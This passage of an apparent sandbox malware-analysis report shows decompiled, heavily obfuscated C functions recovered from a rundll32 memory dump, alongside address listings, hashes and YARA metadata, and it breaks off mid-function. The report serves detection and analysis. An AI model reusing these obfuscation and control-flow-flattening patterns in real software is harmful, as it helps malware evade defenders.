                                                                      0x01fffbd8
                                                                      0x01fffbe0
                                                                      0x01fffbe8
                                                                      0x01fffbf0
                                                                      0x01fffbf8
                                                                      0x01fffc04
                                                                      0x01fffc09
                                                                      0x01fffc0f
                                                                      0x01fffc17
                                                                      0x01fffc1f
                                                                      0x01fffc27
                                                                      0x01fffc2f
                                                                      0x01fffc37
                                                                      0x01fffc43
                                                                      0x01fffc48
                                                                      0x01fffc4e
                                                                      0x01fffc56
                                                                      0x01fffc5e
                                                                      0x01fffc66
                                                                      0x01fffc73
                                                                      0x01fffc74
                                                                      0x01fffc78
                                                                      0x01fffc80
                                                                      0x01fffc88
                                                                      0x01fffc90
                                                                      0x01fffc9d
                                                                      0x01fffca7
                                                                      0x01fffcab
                                                                      0x01fffcaf
                                                                      0x01fffcb7
                                                                      0x01fffcbf
                                                                      0x01fffcc9
                                                                      0x01fffccd
                                                                      0x01fffcd5
                                                                      0x01fffcdd
                                                                      0x01fffcdd
                                                                      0x01fffce1
                                                                      0x01fffce1
                                                                      0x01fffce1
                                                                      0x01fffce7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01fffced
                                                                      0x01fffdbb
                                                                      0x01fffdc1
                                                                      0x01fffcdd
                                                                      0x01fffcdd
                                                                      0x00000000
                                                                      0x01fffcdd
                                                                      0x01fffcdd
                                                                      0x01fffcf9
                                                                      0x01fffda5
                                                                      0x00000000
                                                                      0x01fffda5
                                                                      0x01fffd05
                                                                      0x01fffd95
                                                                      0x01fffed9
                                                                      0x01fffee2
                                                                      0x01fffee2
                                                                      0x01fffd9b
                                                                      0x00000000
                                                                      0x01fffd9b
                                                                      0x01fffd11
                                                                      0x01fffec7
                                                                      0x01fffed3
                                                                      0x01fffed8
                                                                      0x00000000
                                                                      0x01fffec7
                                                                      0x01fffd1d
                                                                      0x01fffd46
                                                                      0x01fffd59
                                                                      0x01fffd77
                                                                      0x01fffd7e
                                                                      0x01fffd84
                                                                      0x01fffd87
                                                                      0x01fffcdd
                                                                      0x01fffcdd
                                                                      0x00000000
                                                                      0x01fffcdd
                                                                      0x01fffcdd
                                                                      0x01fffd25
                                                                      0x01fffeb8
                                                                      0x01fffebe
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01fffcdd
                                                                      0x01fffcdd
                                                                      0x00000000
                                                                      0x01fffcdd
                                                                      0x01fffcdd
                                                                      0x01fffd37
                                                                      0x01fffd3c
                                                                      0x01fffd3f
                                                                      0x01fffcdd
                                                                      0x01fffcdd
                                                                      0x00000000
                                                                      0x01fffcdd
                                                                      0x01fffcdd
                                                                      0x01fffdd1
                                                                      0x01fffe80
                                                                      0x01fffe9d
                                                                      0x01fffea2
                                                                      0x01fffea7
                                                                      0x01fffeb3
                                                                      0x00000000
                                                                      0x01fffeb3
                                                                      0x01fffea9
                                                                      0x01fffcdd
                                                                      0x01fffcdd
                                                                      0x00000000
                                                                      0x01fffcdd
                                                                      0x01fffcdd
                                                                      0x01fffddd
                                                                      0x01fffe48
                                                                      0x01fffe56
                                                                      0x01fffe57
                                                                      0x01fffe5c
                                                                      0x01fffe61
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01fffe63
                                                                      0x01fffe65
                                                                      0x01fffe6d
                                                                      0x01fffe71
                                                                      0x01fffe74
                                                                      0x01fffe78
                                                                      0x00000000
                                                                      0x01fffe78
                                                                      0x01fffde5
                                                                      0x01fffe38
                                                                      0x00000000
                                                                      0x01fffe38
                                                                      0x01fffded
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01fffdf3
                                                                      0x01fffe06
                                                                      0x01fffe0c
                                                                      0x01fffe1b
                                                                      0x01fffe20
                                                                      0x01fffe25
                                                                      0x01fffe2d
                                                                      0x01fffe2d

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (x$_M$b$q7$?$U
                                                                      • API String ID: 0-3432079992
                                                                      • Opcode ID: e362a5c821fcb55250e247287a8bff3fcc8dbb3b79d03946d08a12911980b4c5
                                                                      • Instruction ID: 6723d5c7876534198185c87b8ecb4278e1a30557ef8fb888dc27456f46a40350
                                                                      • Opcode Fuzzy Hash: e362a5c821fcb55250e247287a8bff3fcc8dbb3b79d03946d08a12911980b4c5
                                                                      • Instruction Fuzzy Hash: DAD143725087418FE368CF25C88991FBBE1FF84704F108A1DF696962A0D3B6DA49CF46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0023EF2E, Relevance: 7.8, Strings: 6, Instructions: 288COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (x$_M$b$q7$?$U
                                                                      • API String ID: 0-3432079992
                                                                      • Opcode ID: 783565f6daaf8394181f1f84426d1e8f682b391c744a7ddb6f995b441d0267f5
                                                                      • Instruction ID: 4e256159ec8f87937818e378f8065cf8d6db0c7f9bb5ef4df3050836d2cfd18f
                                                                      • Opcode Fuzzy Hash: 783565f6daaf8394181f1f84426d1e8f682b391c744a7ddb6f995b441d0267f5
                                                                      • Instruction Fuzzy Hash: 1AD175B15183418FD768CF25C98991BBBF1FBC4708F108A2DF696962A0C3B6D959CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02002C05, Relevance: 6.4, Strings: 5, Instructions: 196COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 93%
                                                                      			E02002C05() {
				char _v524;
				void* _v536;
				intOrPtr _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				short* _t200;
				void* _t208;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t246;
				void* _t248;

				_t248 = (_t246 & 0xfffffff8) - 0x268;
				_v540 = 0x4aeeb3;
				asm("stosd");
				_t208 = 0x168467f0;
				_t237 = 0x77;
				asm("stosd");
				asm("stosd");
				_v568 = 0xd92c;
				_v568 = _v568 >> 3;
				_v568 = _v568 << 4;
				_v568 = _v568 ^ 0x0001ce43;
				_v604 = 0x418b;
				_v604 = _v604 * 0x64;
				_v604 = _v604 + 0xffff391d;
				_v604 = _v604 / _t237;
				_v604 = _v604 ^ 0x00007a4a;
				_v596 = 0xd566;
				_v596 = _v596 | 0xeedd709a;
				_v596 = _v596 ^ 0xf9b8657b;
				_t238 = 0x6f;
				_v596 = _v596 * 0x5e;
				_v596 = _v596 ^ 0x974b04be;
				_v612 = 0x6f9a;
				_v612 = _v612 | 0x3884a709;
				_v612 = _v612 << 0xf;
				_v612 = _v612 << 6;
				_v612 = _v612 ^ 0xf3601087;
				_v580 = 0x8bec;
				_v580 = _v580 >> 9;
				_v580 = _v580 ^ 0x2eaf309c;
				_v580 = _v580 ^ 0x2eaf504a;
				_v560 = 0xa090;
				_v560 = _v560 * 9;
				_v560 = _v560 ^ 0x0005eac7;
				_v544 = 0x385a;
				_v544 = _v544 ^ 0x5ab572c8;
				_v544 = _v544 ^ 0x5ab54f08;
				_v616 = 0x2ce0;
				_v616 = _v616 * 0x53;
				_v616 = _v616 | 0xcc7552e6;
				_v616 = _v616 << 0xa;
				_v616 = _v616 ^ 0xff7bc757;
				_v588 = 0xba69;
				_v588 = _v588 ^ 0x8b3f6b4e;
				_v588 = _v588 | 0x1d9047e7;
				_v588 = _v588 * 0x71;
				_v588 = _v588 ^ 0x83ae1873;
				_v600 = 0x31bb;
				_v600 = _v600 | 0x7d88d622;
				_v600 = _v600 >> 6;
				_v600 = _v600 << 3;
				_v600 = _v600 ^ 0x0fb10440;
				_v608 = 0xa2c7;
				_v608 = _v608 | 0x1a87515d;
				_v608 = _v608 + 0x2205;
				_v608 = _v608 << 0xc;
				_v608 = _v608 ^ 0x815e66bd;
				_v548 = 0x16a6;
				_v548 = _v548 / _t238;
				_v548 = _v548 ^ 0x00007853;
				_v564 = 0xafe9;
				_v564 = _v564 >> 6;
				_v564 = _v564 + 0x5855;
				_v564 = _v564 ^ 0x00006462;
				_v572 = 0x600e;
				_v572 = _v572 >> 0x10;
				_v572 = _v572 + 0xffff4dcd;
				_v572 = _v572 ^ 0xffff74cd;
				_v576 = 0x4506;
				_v576 = _v576 ^ 0x208744c8;
				_t239 = 0x27;
				_v576 = _v576 / _t239;
				_v576 = _v576 ^ 0x00d5f9e3;
				_v552 = 0x4cfb;
				_t240 = 0x5d;
				_v552 = _v552 / _t240;
				_v552 = _v552 ^ 0x00002411;
				_v584 = 0xa1f9;
				_v584 = _v584 * 0x65;
				_v584 = _v584 >> 7;
				_v584 = _v584 + 0xffff7216;
				_v584 = _v584 ^ 0xffffd98b;
				_v556 = 0x4ff1;
				_v556 = _v556 + 0xffffdafb;
				_v556 = _v556 ^ 0x000023fd;
				_v592 = 0xb847;
				_v592 = _v592 ^ 0xa357aca7;
				_v592 = _v592 * 0x3b;
				_v592 = _v592 << 2;
				_v592 = _v592 ^ 0x94472c8e;
				do {
					while(_t208 != 0xdfc3d3e) {
						if(_t208 == 0x107f2098) {
							_t200 = E01FFD6F0(E01FFFFBA, _v552, _v584, _v556,  &_v524, _v592, 0,  &_v524);
						} else {
							if(_t208 == 0x168467f0) {
								_t208 = 0x2514110a;
								continue;
							} else {
								_t255 = _t208 - 0x2514110a;
								if(_t208 != 0x2514110a) {
									goto L8;
								} else {
									_push(0x1ff12d8);
									_push(_v612);
									_push(_v596);
									E01FFA4D7(_t255, _v560, _v544, _v616, _v588, E01FF5DFC(_v568, _v604, _t255),  *0x2011088 + 0x254,  &_v524,  *0x2011088 + 0x38);
									_t200 = E02000D6D(_v600, _v608, _v548, _t202);
									_t248 = _t248 + 0x34;
									_t208 = 0xdfc3d3e;
									continue;
								}
							}
						}
						L11:
						return _t200;
					}
					_t200 = E01FFBDCC( &_v524, _v564, _v572, _v576);
					__eflags = 0;
					 *_t200 = 0;
					_t208 = 0x107f2098;
					L8:
					__eflags = _t208 - 0x23e79497;
				} while (__eflags != 0);
				goto L11;
			}

































                                                                      0x02002c0b
                                                                      0x02002c11
                                                                      0x02002c25
                                                                      0x02002c26
                                                                      0x02002c2d
                                                                      0x02002c30
                                                                      0x02002c31
                                                                      0x02002c32
                                                                      0x02002c3a
                                                                      0x02002c3f
                                                                      0x02002c44
                                                                      0x02002c4c
                                                                      0x02002c59
                                                                      0x02002c5d
                                                                      0x02002c6d
                                                                      0x02002c71
                                                                      0x02002c79
                                                                      0x02002c81
                                                                      0x02002c89
                                                                      0x02002c96
                                                                      0x02002c97
                                                                      0x02002c9b
                                                                      0x02002ca3
                                                                      0x02002cab
                                                                      0x02002cb3
                                                                      0x02002cb8
                                                                      0x02002cbd
                                                                      0x02002cc5
                                                                      0x02002ccd
                                                                      0x02002cd2
                                                                      0x02002cda
                                                                      0x02002ce2
                                                                      0x02002cef
                                                                      0x02002cf3
                                                                      0x02002cfb
                                                                      0x02002d03
                                                                      0x02002d0b
                                                                      0x02002d13
                                                                      0x02002d20
                                                                      0x02002d24
                                                                      0x02002d2c
                                                                      0x02002d31
                                                                      0x02002d39
                                                                      0x02002d41
                                                                      0x02002d49
                                                                      0x02002d56
                                                                      0x02002d5a
                                                                      0x02002d62
                                                                      0x02002d6a
                                                                      0x02002d72
                                                                      0x02002d77
                                                                      0x02002d7c
                                                                      0x02002d84
                                                                      0x02002d8c
                                                                      0x02002d94
                                                                      0x02002d9c
                                                                      0x02002da1
                                                                      0x02002da9
                                                                      0x02002db7
                                                                      0x02002dbb
                                                                      0x02002dc3
                                                                      0x02002dcb
                                                                      0x02002dd0
                                                                      0x02002dd8
                                                                      0x02002de2
                                                                      0x02002def
                                                                      0x02002df9
                                                                      0x02002e06
                                                                      0x02002e0e
                                                                      0x02002e16
                                                                      0x02002e24
                                                                      0x02002e29
                                                                      0x02002e2f
                                                                      0x02002e37
                                                                      0x02002e43
                                                                      0x02002e46
                                                                      0x02002e4a
                                                                      0x02002e52
                                                                      0x02002e5f
                                                                      0x02002e63
                                                                      0x02002e68
                                                                      0x02002e70
                                                                      0x02002e78
                                                                      0x02002e80
                                                                      0x02002e88
                                                                      0x02002e90
                                                                      0x02002e98
                                                                      0x02002ea5
                                                                      0x02002ea9
                                                                      0x02002eae
                                                                      0x02002eb6
                                                                      0x02002eb6
                                                                      0x02002ec0
                                                                      0x02002f91
                                                                      0x02002ec6
                                                                      0x02002ecc
                                                                      0x02002f41
                                                                      0x00000000
                                                                      0x02002ece
                                                                      0x02002ece
                                                                      0x02002ed0
                                                                      0x00000000
                                                                      0x02002ed6
                                                                      0x02002ed6
                                                                      0x02002edb
                                                                      0x02002edf
                                                                      0x02002f20
                                                                      0x02002f32
                                                                      0x02002f37
                                                                      0x02002f3a
                                                                      0x00000000
                                                                      0x02002f3a
                                                                      0x02002ed0
                                                                      0x02002ecc
                                                                      0x02002f99
                                                                      0x02002fa0
                                                                      0x02002fa0
                                                                      0x02002f58
                                                                      0x02002f5f
                                                                      0x02002f61
                                                                      0x02002f64
                                                                      0x02002f66
                                                                      0x02002f66
                                                                      0x02002f66
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Jz$Sx$Z8$bd$,
                                                                      • API String ID: 0-4260221676
                                                                      • Opcode ID: 93b52e81e54576fc4fb60a1d9fa16e82e0d1f90e184530b595e34fe7da8a42aa
                                                                      • Instruction ID: 79bf8c60b0311dc2b4e5dda453de5d87a5952cd8dc48d33fdba59232436e7331
                                                                      • Opcode Fuzzy Hash: 93b52e81e54576fc4fb60a1d9fa16e82e0d1f90e184530b595e34fe7da8a42aa
                                                                      • Instruction Fuzzy Hash: E5912F715083419FD358CF65D88981FFBF1BB85748F108A1DF696962A0D3B68A49CF83
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00242179, Relevance: 6.4, Strings: 5, Instructions: 196COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Jz$Sx$Z8$bd$,
                                                                      • API String ID: 0-4260221676
                                                                      • Opcode ID: 66d0b6c60246877f17bc3dfb7a2af81e84fbea4fa8362f65fd740d4ef723ee12
                                                                      • Instruction ID: 513dfc2032b216a08de41d2f87313c5f54a61664968b66106f9f89887d9a34a2
                                                                      • Opcode Fuzzy Hash: 66d0b6c60246877f17bc3dfb7a2af81e84fbea4fa8362f65fd740d4ef723ee12
                                                                      • Instruction Fuzzy Hash: DE912E711183419FD358CF66C88981FFBE1FBC9748F508A1DF296962A0D3B58A59CF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FF7B39, Relevance: 6.4, Strings: 5, Instructions: 185COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 93%
                                                                      			E01FF7B39(void* __ecx, void* __edx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12) {
				char _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				unsigned int _v124;
				signed int _v128;
				void* _t159;
				signed int _t184;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				void* _t195;
				signed int* _t216;
				signed int* _t219;

				_t216 = _a8;
				_push(_a12);
				_t215 = _a4;
				_push(_t216);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02002550(_t159);
				_v84 = 0xb1cc;
				_t219 =  &(( &_v128)[5]);
				_v84 = _v84 << 4;
				_v84 = _v84 ^ 0x000b391c;
				_t195 = 0x56cb2a8;
				_v128 = 0xbdb6;
				_t189 = 0x75;
				_v128 = _v128 * 0x3c;
				_v128 = _v128 + 0xffff325f;
				_v128 = _v128 | 0xdb930895;
				_v128 = _v128 ^ 0xdbbbdb43;
				_v120 = 0x3f39;
				_v120 = _v120 / _t189;
				_v120 = _v120 | 0x67adff47;
				_t190 = 0x54;
				_v120 = _v120 / _t190;
				_v120 = _v120 ^ 0x013b8a2c;
				_v124 = 0x6147;
				_v124 = _v124 + 0xb97c;
				_v124 = _v124 + 0xd90c;
				_v124 = _v124 >> 0xe;
				_v124 = _v124 ^ 0x00007a9c;
				_v112 = 0x89a1;
				_t191 = 0x58;
				_v112 = _v112 / _t191;
				_v112 = _v112 + 0xf8e9;
				_v112 = _v112 >> 3;
				_v112 = _v112 ^ 0x0000539c;
				_v76 = 0x8cc3;
				_v76 = _v76 + 0xac03;
				_v76 = _v76 ^ 0x00011eb4;
				_v116 = 0xfa45;
				_v116 = _v116 + 0xffff9361;
				_v116 = _v116 | 0xe6f660f2;
				_v116 = _v116 >> 1;
				_v116 = _v116 ^ 0x737b7b0a;
				_v104 = 0xcf7e;
				_v104 = _v104 << 0xe;
				_v104 = _v104 * 0x27;
				_v104 = _v104 ^ 0xe70cfdcc;
				_v72 = 0x35c6;
				_v72 = _v72 ^ 0x4611c0ec;
				_v72 = _v72 ^ 0x4611c92f;
				_v100 = 0x6fa4;
				_v100 = _v100 * 0x52;
				_v100 = _v100 | 0xcb75e14d;
				_v100 = _v100 ^ 0xcb77ed32;
				_v68 = 0x95e2;
				_v68 = _v68 + 0x2a27;
				_v68 = _v68 ^ 0x0000e822;
				_v88 = 0xac43;
				_v88 = _v88 * 0x58;
				_v88 = _v88 >> 8;
				_v88 = _v88 ^ 0x00007f70;
				_v92 = 0x7b7b;
				_v92 = _v92 + 0xffffa4a1;
				_v92 = _v92 << 0xd;
				_v92 = _v92 ^ 0x0403a3f8;
				_v96 = 0x9efc;
				_v96 = _v96 ^ 0x9f755fcb;
				_t192 = 0x7a;
				_v96 = _v96 / _t192;
				_v96 = _v96 ^ 0x014e9ac3;
				_v80 = 0x52a1;
				_v80 = _v80 >> 1;
				_v80 = _v80 ^ 0x00002d50;
				_v108 = 0x1e90;
				_v108 = _v108 + 0xffffb99d;
				_v108 = _v108 + 0xd5ca;
				_v108 = _v108 ^ 0x0000a5f7;
				do {
					while(_t195 != 0x56cb2a8) {
						if(_t195 == 0x686a9af) {
							E01FFBAD2(_v68, _v88, __eflags, _t215 + 4,  &_v64, _v92);
						} else {
							if(_t195 == 0xd2701c0) {
								E01FFF834( *_t215, _v72,  &_v64, _v100);
								_t219 =  &(_t219[2]);
								_t195 = 0x686a9af;
								continue;
							} else {
								if(_t195 == 0x104361af) {
									_t214 =  &_v64;
									E01FFFEE3(_t216,  &_v64, _v112, _v76, _v116, _v104);
									_t219 =  &(_t219[4]);
									_t195 = 0xd2701c0;
									continue;
								} else {
									if(_t195 == 0x1c12ad24) {
										_t214 = _t216[1];
										_push(_t195);
										_t184 = E01FF54FB(_t216[1]);
										 *_t216 = _t184;
										__eflags = _t184;
										if(__eflags != 0) {
											_t195 = 0x104361af;
											continue;
										}
									} else {
										_t227 = _t195 - 0x25d9ecfc;
										if(_t195 != 0x25d9ecfc) {
											goto L13;
										} else {
											_t216[1] = E01FF3134(_t215);
											_t216[1] = _t216[1] + E01FFDF8A(_t215, _t214, _t227, _v108, _v80);
											_t195 = 0x1c12ad24;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t216;
						_t158 =  *_t216 != 0;
						__eflags = _t158;
						return 0 | _t158;
					}
					_t195 = 0x25d9ecfc;
					 *_t216 =  *_t216 & 0x00000000;
					__eflags =  *_t216;
					_t216[1] = _v96;
					L13:
					__eflags = _t195 - 0xb99db01;
				} while (__eflags != 0);
				goto L16;
			}





























                                                                      0x01ff7b42
                                                                      0x01ff7b4a
                                                                      0x01ff7b51
                                                                      0x01ff7b58
                                                                      0x01ff7b59
                                                                      0x01ff7b5a
                                                                      0x01ff7b5b
                                                                      0x01ff7b5c
                                                                      0x01ff7b61
                                                                      0x01ff7b69
                                                                      0x01ff7b6c
                                                                      0x01ff7b73
                                                                      0x01ff7b7b
                                                                      0x01ff7b80
                                                                      0x01ff7b8f
                                                                      0x01ff7b92
                                                                      0x01ff7b96
                                                                      0x01ff7b9e
                                                                      0x01ff7ba6
                                                                      0x01ff7bae
                                                                      0x01ff7bbe
                                                                      0x01ff7bc2
                                                                      0x01ff7bce
                                                                      0x01ff7bd3
                                                                      0x01ff7bd9
                                                                      0x01ff7be1
                                                                      0x01ff7be9
                                                                      0x01ff7bf1
                                                                      0x01ff7bf9
                                                                      0x01ff7bfe
                                                                      0x01ff7c06
                                                                      0x01ff7c12
                                                                      0x01ff7c15
                                                                      0x01ff7c19
                                                                      0x01ff7c21
                                                                      0x01ff7c26
                                                                      0x01ff7c2e
                                                                      0x01ff7c36
                                                                      0x01ff7c3e
                                                                      0x01ff7c46
                                                                      0x01ff7c4e
                                                                      0x01ff7c56
                                                                      0x01ff7c5e
                                                                      0x01ff7c62
                                                                      0x01ff7c6a
                                                                      0x01ff7c72
                                                                      0x01ff7c7c
                                                                      0x01ff7c80
                                                                      0x01ff7c88
                                                                      0x01ff7c90
                                                                      0x01ff7c98
                                                                      0x01ff7ca0
                                                                      0x01ff7cad
                                                                      0x01ff7cb1
                                                                      0x01ff7cb9
                                                                      0x01ff7cc1
                                                                      0x01ff7cc9
                                                                      0x01ff7cd1
                                                                      0x01ff7cd9
                                                                      0x01ff7ce6
                                                                      0x01ff7cea
                                                                      0x01ff7cef
                                                                      0x01ff7cf9
                                                                      0x01ff7d06
                                                                      0x01ff7d0e
                                                                      0x01ff7d13
                                                                      0x01ff7d1b
                                                                      0x01ff7d23
                                                                      0x01ff7d31
                                                                      0x01ff7d39
                                                                      0x01ff7d3d
                                                                      0x01ff7d45
                                                                      0x01ff7d4d
                                                                      0x01ff7d51
                                                                      0x01ff7d59
                                                                      0x01ff7d61
                                                                      0x01ff7d69
                                                                      0x01ff7d71
                                                                      0x01ff7d79
                                                                      0x01ff7d79
                                                                      0x01ff7d8b
                                                                      0x01ff7e77
                                                                      0x01ff7d91
                                                                      0x01ff7d97
                                                                      0x01ff7e36
                                                                      0x01ff7e3b
                                                                      0x01ff7e3e
                                                                      0x00000000
                                                                      0x01ff7d9d
                                                                      0x01ff7d9f
                                                                      0x01ff7e03
                                                                      0x01ff7e15
                                                                      0x01ff7e1a
                                                                      0x01ff7e1d
                                                                      0x00000000
                                                                      0x01ff7da1
                                                                      0x01ff7da7
                                                                      0x01ff7de4
                                                                      0x01ff7de7
                                                                      0x01ff7de8
                                                                      0x01ff7ded
                                                                      0x01ff7df0
                                                                      0x01ff7df2
                                                                      0x01ff7df8
                                                                      0x00000000
                                                                      0x01ff7df8
                                                                      0x01ff7da9
                                                                      0x01ff7da9
                                                                      0x01ff7dab
                                                                      0x00000000
                                                                      0x01ff7db1
                                                                      0x01ff7db8
                                                                      0x01ff7dd0
                                                                      0x01ff7dd5
                                                                      0x00000000
                                                                      0x01ff7dd5
                                                                      0x01ff7dab
                                                                      0x01ff7da7
                                                                      0x01ff7d9f
                                                                      0x01ff7d97
                                                                      0x01ff7e7f
                                                                      0x01ff7e81
                                                                      0x01ff7e86
                                                                      0x01ff7e86
                                                                      0x01ff7e90
                                                                      0x01ff7e90
                                                                      0x01ff7e4c
                                                                      0x01ff7e4e
                                                                      0x01ff7e4e
                                                                      0x01ff7e51
                                                                      0x01ff7e54
                                                                      0x01ff7e54
                                                                      0x01ff7e54
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: {{s$"$Ga$P-${{
                                                                      • API String ID: 0-2936447301
                                                                      • Opcode ID: 39ec68ea787343e8064b98ec4664fe2485481eda1314bce75b272653a1e2ae17
                                                                      • Instruction ID: 83293d55a8cdaf50a0f7e94548da0bf389d6ad00a01ff90d28ef7714235d2e52
                                                                      • Opcode Fuzzy Hash: 39ec68ea787343e8064b98ec4664fe2485481eda1314bce75b272653a1e2ae17
                                                                      • Instruction Fuzzy Hash: AA8105725083429FD358DF25C48981FBBF1AFC8358F50891DF299962A0D7B9DA49CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 002370AD, Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: {{s$"$Ga$P-${{
                                                                      • API String ID: 0-2936447301
                                                                      • Opcode ID: cea13ba85886a609e731189476ad41596344b7230d863bf0c99a5505cd97314b
                                                                      • Instruction ID: b04fef8c0c99131cb5e939f21a8169d79f20b2761cb10c6038fbc338969a76f0
                                                                      • Opcode Fuzzy Hash: cea13ba85886a609e731189476ad41596344b7230d863bf0c99a5505cd97314b
                                                                      • Instruction Fuzzy Hash: 85812FB15183429FD768CF21C48981FBBE1BBC8358F50891DF59A962A0D3B9DA198F42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FF2DDF, Relevance: 6.4, Strings: 5, Instructions: 184COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 72%
                                                                      			E01FF2DDF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v556;
				signed int _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				void* _t153;
				signed int _t171;
				signed int _t174;
				void* _t178;
				signed int _t186;
				void* _t201;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int* _t209;

				_push(_a8);
				_t201 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02002550(_t153);
				_v560 = _v560 & 0x00000000;
				_t209 =  &(( &_v628)[4]);
				_v568 = 0x24f3a1;
				_v564 = 0x3c9bd4;
				_t178 = 0x32110b52;
				_v576 = 0x263a;
				_v576 = _v576 << 1;
				_v576 = _v576 ^ 0x00007813;
				_v620 = 0x4ee;
				_t202 = 0x33;
				_v620 = _v620 / _t202;
				_v620 = _v620 + 0xffff352c;
				_v620 = _v620 ^ 0xc3d5301d;
				_v620 = _v620 ^ 0x3c2a31a1;
				_v600 = 0x4188;
				_v600 = _v600 + 0xffffb186;
				_v600 = _v600 << 6;
				_v600 = _v600 ^ 0xfffcab3f;
				_v628 = 0xc09d;
				_v628 = _v628 + 0xffff1566;
				_v628 = _v628 | 0xe9e98308;
				_v628 = _v628 << 0xf;
				_v628 = _v628 ^ 0xeb85c3aa;
				_v608 = 0x281d;
				_t203 = 0x58;
				_v608 = _v608 / _t203;
				_v608 = _v608 | 0xeb359492;
				_v608 = _v608 ^ 0xeb35e871;
				_v612 = 0x4fd;
				_t204 = 0x71;
				_v612 = _v612 * 0x31;
				_v612 = _v612 + 0xffff74e9;
				_v612 = _v612 ^ 0x3f703ef4;
				_v612 = _v612 ^ 0x3f704256;
				_v572 = 0x8bdc;
				_v572 = _v572 >> 6;
				_v572 = _v572 ^ 0x00004ce8;
				_v616 = 0xbbb9;
				_v616 = _v616 * 0x57;
				_v616 = _v616 + 0x295;
				_v616 = _v616 ^ 0x9d8bead1;
				_v616 = _v616 ^ 0x9db42d64;
				_v592 = 0xdb3f;
				_v592 = _v592 | 0x5fa632d8;
